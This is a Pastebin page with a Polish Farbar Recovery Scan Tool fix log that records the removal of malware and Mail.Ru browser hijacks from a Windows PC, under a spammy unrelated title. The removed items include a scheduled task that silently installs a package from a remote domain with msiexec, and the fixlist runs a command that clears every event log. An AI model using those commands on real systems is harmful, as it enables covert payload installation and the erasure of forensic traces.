Facebook

Untitled safest cryptocurrency exchange

From Jai Kumar, 5 Years ago, written in Plain Text.
URL https://pastebin.pl/view/9540962a
Embed
Download Paste or View Raw
Hits: 288
  1. Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 11.03.2019
  2. Uruchomiony przez joannas (13-03-2019 20:00:36) Run:1
  3. Uruchomiony z C:\Users\joannas\Downloads
  4. Załadowane profile: joannas (Dostępne profile: joannas)
  5. Tryb startu: Normal
  6. ==============================================
  7.  
  8. fixlist - zawartość:
  9. *****************
  10.  
  11.  
  12.         CloseProcesses:
  13.         ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
  14.         ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =>  -> Brak pliku
  15.         ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
  16.         ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =>  -> Brak pliku
  17.         ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
  18.         ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
  19.         ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
  20.         Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
  21.         Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
  22.         Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
  23.         FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
  24.         FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
  25.         C:\Program Files (x86)\Common Files\INhrB.exe
  26.         C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
  27.         FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
  28.         FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
  29.         FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
  30.         FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
  31.         1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
  32.         1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
  33.         2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
  34.         HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
  35.         SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
  36.         SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
  37.         SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
  38.         BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
  39.         Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
  40.         2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
  41.         2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
  42.         2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
  43.         CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
  44.         CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
  45.         S3 mfeavfk04; \Device\mfeavfk04.sys [X]
  46.         Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
  47.         EmptyTemp:
  48.  
  49.  
  50. *****************
  51.  
  52. Procesy zostały pomyślnie zamknięte.
  53. HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
  54. HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
  55. HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => pomyślnie usunięto
  56. HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => nie znaleziono
  57. HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
  58. "HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}" => pomyślnie usunięto
  59. HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => pomyślnie usunięto
  60. HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => nie znaleziono
  61. HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
  62. HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
  63. HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
  64. HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
  65. HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
  66. HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D} => nie znaleziono
  67. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
  68. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
  69. C:\WINDOWS\System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => pomyślnie przeniesiono
  70. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3543EE5D-FE99-AD25-23F5-03742BD2251B}" => pomyślnie usunięto
  71. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
  72. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
  73. C:\WINDOWS\System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => pomyślnie przeniesiono
  74. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54D55C0D-2609-A62F-A35D-C02F1C8F7189}" => pomyślnie usunięto
  75. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
  76. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
  77. C:\WINDOWS\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => pomyślnie przeniesiono
  78. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP" => pomyślnie usunięto
  79. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}" => pomyślnie usunięto
  80. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}" => pomyślnie usunięto
  81. C:\Program Files (x86)\Common Files\INhrB.exe => pomyślnie przeniesiono
  82. C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe => pomyślnie przeniesiono
  83. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64503A19-D801-4A3B-80ED-4916B76F6D5E}" => pomyślnie usunięto
  84. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0590994E-2B06-4CFF-89E8-0D5AE7939375}" => pomyślnie usunięto
  85. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
  86. "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
  87. "C:\Program Files (x86)\Common Files\INhrB.exe" => nie znaleziono
  88. C:\Users\joannas\AppData\Local\ieauOreoYaK.exe => pomyślnie przeniesiono
  89. C:\Users\joannas\AppData\Local\wbem.ini => pomyślnie przeniesiono
  90. HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
  91. "HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
  92. HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => pomyślnie usunięto
  93. HKLM\Software\Classes\CLSID\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => nie znaleziono
  94. HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => pomyślnie usunięto
  95. HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => nie znaleziono
  96. HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
  97. HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
  98. HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
  99. HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => pomyślnie usunięto
  100. C:\ProgramData\localNETService => pomyślnie przeniesiono
  101. C:\Users\joannas\AppData\Local\Mail.Ru => pomyślnie przeniesiono
  102. C:\ProgramData\Mail.Ru => pomyślnie przeniesiono
  103. HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
  104. HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
  105. HKLM\System\CurrentControlSet\Services\mfeavfk04 => pomyślnie usunięto
  106. mfeavfk04 => serwis pomyślnie usunięto
  107.  
  108. ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========
  109.  
  110.  
  111. ========= Koniec  Powershell: =========
  112.  
  113.  
  114. =========== EmptyTemp: ==========
  115.  
  116. BITS transfer queue => 9199616 B
  117. DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 881544853 B
  118. Java, Flash, Steam htmlcache => 1568 B
  119. Windows/system/drivers => 733723 B
  120. Edge => 6036248 B
  121. Chrome => 0 B
  122. Firefox => 946688712 B
  123. Opera => 0 B
  124.  
  125. Temp, IE cache, history, cookies, recent:
  126. Default => 6656 B
  127. Users => 0 B
  128. ProgramData => 0 B
  129. Public => 0 B
  130. systemprofile => 12732255 B
  131. systemprofile32 => 0 B
  132. LocalService => 48150 B
  133. LocalService => 0 B
  134. NetworkService => 52568 B
  135. NetworkService => 0 B
  136. joannas => 108308419 B
  137.  
  138. RecycleBin => 0 B
  139. EmptyTemp: => 1.8 GB danych tymczasowych Usunięto.
  140.  
  141. ================================
  142.  
  143.  
  144. System wymagał restartu.
  145.  
  146. ==== Koniec  Fixlog 20:02:18 ====

Reply to "Untitled"